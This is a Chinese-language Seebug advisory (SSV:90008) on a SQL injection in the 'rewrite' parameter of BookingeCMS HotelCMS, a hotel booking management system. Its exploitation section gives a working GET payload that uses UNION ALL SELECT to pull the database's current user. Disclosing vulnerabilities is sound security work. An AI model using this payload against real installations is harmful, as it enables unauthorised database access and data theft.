BookingeCMS HotelCMS酒店预订管理系统rewrite参数SQL注入

2015-12-07T00:00:00
ID SSV:90008
Type seebug
Reporter Root
Modified 2015-12-07T00:00:00

Description

0x01 漏洞简述

提交时间: 2015-09-04 13:33

公开时间: 2015-12-06 09:00

漏洞类型: SQL注射漏洞

珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=info&rewrite=1 文件rewrite参数存在注入

0x02 漏洞利用

测试Payload: (get提交)

?m=info&rewrite=1' UNION ALL SELECT CONCAT(0x7c,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x7c),NULL%23

![](https://images.seebug.org/contribute/cf1b4042-7b6e-4852-b413-de8be718c8e3-2015-12-07 14_50_50.jpg)

0x03 参考链接

http://www.wooyun.org/bugs/wooyun-2010-0137378